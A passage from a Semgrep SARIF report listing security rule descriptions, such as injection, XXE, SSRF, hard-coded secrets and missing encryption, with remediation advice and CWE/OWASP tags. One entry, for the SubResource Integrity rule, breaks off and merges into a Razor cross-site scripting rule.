configuration, no encryption is used. To protect user and application data, the application should specify an encryption key, which is randomly generated per user, per client."},"help":{"markdown":"The application was observed to utilize Realm for data storage, but was not observed to set an encryption key. When no encryption key is set in the configuration, no encryption is used. To protect user and application data, the application should specify an encryption key, which is randomly generated per user, per client.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption)\n - [https://ali-akhtar.medium.com/realm-custom-configuration-and-encryption-realmswift-part-3-f991f090ae22](https://ali-akhtar.medium.com/realm-custom-configuration-and-encryption-realmswift-part-3-f991f090ae22)\n - [https://mas.owasp.org/MASVS/controls/MASVS-STORAGE-1/](https://mas.owasp.org/MASVS/controls/MASVS-STORAGE-1/)\n - [https://mas.owasp.org/MASVS/controls/MASVS-CRYPTO-1/](https://mas.owasp.org/MASVS/controls/MASVS-CRYPTO-1/)\n","text":"The application was observed to utilize Realm for data storage, but was not observed to set an encryption key. When no encryption key is set in the configuration, no encryption is used. To protect user and application data, the application should specify an encryption key, which is randomly generated per user, per client."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption","id":"swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption","name":"swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat","id":"javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat","name":"javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.pg-express.pg-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.pg-express.pg-express","id":"javascript.express.db.pg-express.pg-express","name":"javascript.express.db.pg-express.pg-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.pg-express.pg-express"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped. Ensure data passed to an LDAP query is not controllable or properly sanitize the user input with functions like createEqualityFilter."},"help":{"markdown":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped. Ensure data passed to an LDAP query is not controllable or properly sanitize the user input with functions like createEqualityFilter.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped. Ensure data passed to an LDAP query is not controllable or properly sanitize the user input with functions like createEqualityFilter."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep","id":"java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep","name":"java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for creation of telnet servers or attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"help":{"markdown":"Checks for creation of telnet servers or attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request)\n - [https://docs.ruby-lang.org/en/2.2.0/Net/Telnet.html](https://docs.ruby-lang.org/en/2.2.0/Net/Telnet.html)\n - [https://www.rubydoc.info/gems/net-ssh-telnet2/0.1.0/Net/SSH/Telnet](https://www.rubydoc.info/gems/net-ssh-telnet2/0.1.0/Net/SSH/Telnet)\n","text":"Checks for creation of telnet servers or attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request","id":"problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request","name":"problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead."},"help":{"markdown":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.requests.request-session-http-in-with-context.request-session-http-in-with-context)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.requests.request-session-http-in-with-context.request-session-http-in-with-context","id":"python.lang.security.audit.insecure-transport.requests.request-session-http-in-with-context.request-session-http-in-with-context","name":"python.lang.security.audit.insecure-transport.requests.request-session-http-in-with-context.request-session-http-in-with-context","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.requests.request-session-http-in-with-context.request-session-http-in-with-context"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Consuming CDNs without including a SubResource Integrity (SRI) can expose your application and its users to compromised code. SRIs allow you to consume specific versions of content where if even a single byte is compromised, the resource will not be loaded. Add an integrity attribute to your ` is not properly encoded."},"help":{"markdown":"Unencoded JSON in HTML context is vulnerable to cross-site scripting, because `` is not properly encoded.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.razor.security.html-raw-json.html-raw-json)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Unencoded JSON in HTML context is vulnerable to cross-site scripting, because `` is not properly encoded."},"helpUri":"https://semgrep.dev/r/csharp.razor.security.html-raw-json.html-raw-json","id":"csharp.razor.security.html-raw-json.html-raw-json","name":"csharp.razor.security.html-raw-json.html-raw-json","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.razor.security.html-raw-json.html-raw-json"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities."},"help":{"markdown":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-expat-xxe.express-expat-xxe)\n - [https://github.com/astro/node-expat](https://github.com/astro/node-expat)\n","text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities."},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-expat-xxe.express-expat-xxe","id":"javascript.express.security.express-expat-xxe.express-expat-xxe","name":"javascript.express.security.express-expat-xxe.express-expat-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-expat-xxe.express-expat-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected input from a HTTPServletRequest going into an LDAP query. This could lead to LDAP injection if the input is not properly sanitized, which could result in attackers modifying objects in the LDAP tree structure. Ensure data passed to an LDAP query is not controllable or properly sanitize the data."},"help":{"markdown":"Detected input from a HTTPServletRequest going into an LDAP query. This could lead to LDAP injection if the input is not properly sanitized, which could result in attackers modifying objects in the LDAP tree structure. Ensure data passed to an LDAP query is not controllable or properly sanitize the data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request)\n - [https://sensei.securecodewarrior.com/recipes/scw%3Ajava%3ALDAP-injection](https://sensei.securecodewarrior.com/recipes/scw%3Ajava%3ALDAP-injection)\n","text":"Detected input from a HTTPServletRequest going into an LDAP query. This could lead to LDAP injection if the input is not properly sanitized, which could result in attackers modifying objects in the LDAP tree structure. Ensure data passed to an LDAP query is not controllable or properly sanitize the data."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request","id":"java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request","name":"java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure FSX ONTAP file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure FSX ONTAP file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure FSX ONTAP file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk","id":"terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk","name":"terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Initializing a security context for Dask (`distributed`) without \"require_encryption\" keyword argument may silently fail to provide security."},"help":{"markdown":"Initializing a security context for Dask (`distributed`) without \"require_encryption\" keyword argument may silently fail to provide security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.distributed.security.require-encryption)\n - [https://distributed.dask.org/en/latest/tls.html?highlight=require_encryption#parameters](https://distributed.dask.org/en/latest/tls.html?highlight=require_encryption#parameters)\n","text":"Initializing a security context for Dask (`distributed`) without \"require_encryption\" keyword argument may silently fail to provide security."},"helpUri":"https://semgrep.dev/r/python.distributed.security.require-encryption","id":"python.distributed.security.require-encryption","name":"python.distributed.security.require-encryption","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.distributed.security.require-encryption"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password","id":"python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password","name":"python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of dynamic execution of JavaScript which may come from user-input, which can lead to Cross-Site-Scripting (XSS). Where possible avoid including user-input in functions which dynamically execute user-input."},"help":{"markdown":"Detected use of dynamic execution of JavaScript which may come from user-input, which can lead to Cross-Site-Scripting (XSS). Where possible avoid including user-input in functions which dynamically execute user-input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression)\n - [https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval#never_use_eval!](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval#never_use_eval!)\n","text":"Detected use of dynamic execution of JavaScript which may come from user-input, which can lead to Cross-Site-Scripting (XSS). Where possible avoid including user-input in functions which dynamically execute user-input."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression","id":"javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression","name":"javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko","id":"python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko","name":"python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'syscall' is essentially unsafe and unportable. The DL (https://apidock.com/ruby/Fiddle) library is preferred for safer and a bit more portable programming."},"help":{"markdown":"'syscall' is essentially unsafe and unportable. The DL (https://apidock.com/ruby/Fiddle) library is preferred for safer and a bit more portable programming.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-syscall.dangerous-syscall)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"'syscall' is essentially unsafe and unportable. The DL (https://apidock.com/ruby/Fiddle) library is preferred for safer and a bit more portable programming."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-syscall.dangerous-syscall","id":"ruby.lang.security.dangerous-syscall.dangerous-syscall","name":"ruby.lang.security.dangerous-syscall.dangerous-syscall","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-syscall.dangerous-syscall"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key","id":"javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key","name":"javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"X-XSS-Protection header is set to 0. This will disable the browser's XSS Filter."},"help":{"markdown":"X-XSS-Protection header is set to 0. This will disable the browser's XSS Filter.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"X-XSS-Protection header is set to 0. This will disable the browser's XSS Filter."},"helpUri":"https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled","id":"typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled","name":"typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid rendering user input. It may be possible for a malicious user to input a path that lets them access a template they shouldn't. To prevent this, check dynamic template paths against a predefined allowlist to make sure it's an allowed template."},"help":{"markdown":"Avoid rendering user input. It may be possible for a malicious user to input a path that lets them access a template they shouldn't. To prevent this, check dynamic template paths against a predefined allowlist to make sure it's an allowed template.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path)\n - [https://brakemanscanner.org/docs/warning_types/dynamic_render_paths/](https://brakemanscanner.org/docs/warning_types/dynamic_render_paths/)\n","text":"Avoid rendering user input. It may be possible for a malicious user to input a path that lets them access a template they shouldn't. To prevent this, check dynamic template paths against a predefined allowlist to make sure it's an allowed template."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path","id":"ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path","name":"ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2)\n - [https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py](https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py)\n - [https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings](https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2","id":"python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2","name":"python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: 